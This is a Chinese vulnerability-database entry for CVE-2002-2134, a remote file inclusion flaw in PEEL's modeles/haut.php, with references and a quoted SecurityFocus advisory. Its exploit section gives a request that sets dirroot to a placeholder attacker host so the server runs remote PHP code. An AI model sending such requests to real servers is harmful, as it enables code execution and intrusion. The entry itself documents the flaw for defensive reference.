PEEL远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107144 漏洞类型 输入验证
发布时间 2002-12-31 更新时间 2006-01-25
CVE编号 CVE-2002-2134 CNNVD-ID CNNVD-200212-258
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/22114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-258
|漏洞详情
PEEL是一款PHP编写的目录管理工具。haut.php脚本对用户提交的参数缺少正确检查,远程攻击者可以利用这个漏洞指定远程服务器上任意文件为包含文件,以WEB权限执行包含文件中的代码。modeles/haut.php没有正确处理$dirroot参数的内容,远程攻击者可以在自己控制的服务器上构建任意PHP文件,提交包含远程服务器文件的参数数据的请求,可导致包含文件的代码以WEB权限在系统上执行。
|漏洞EXP
source: http://www.securityfocus.com/bid/6496/info

PEEL is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.

An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.

If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker. 

http://[target]/modeles/haut.php?dirroot=http://[attacker]&SESSION=.
with :
http://[attacker]/lang/lang.php
|参考资料

来源:BUGTRAQ
名称:20021231PEEL(PHP)
链接:http://www.securityfocus.com/archive/1/304779
来源:BID
名称:6496
链接:http://www.securityfocus.com/bid/6496
来源:XF
名称:peel-haut-file-include(10960)
链接:http://www.iss.net/security_center/static/10960.php
来源:SECTRACK
名称:1005869
链接:http://www.securitytracker.com/id?1005869
来源:SECUNIA
名称:7797
链接:http://secunia.com/advisories/7797
来源:NSFOCUS
名称:4138
链接:http://www.nsfocus.net/vulndb/4138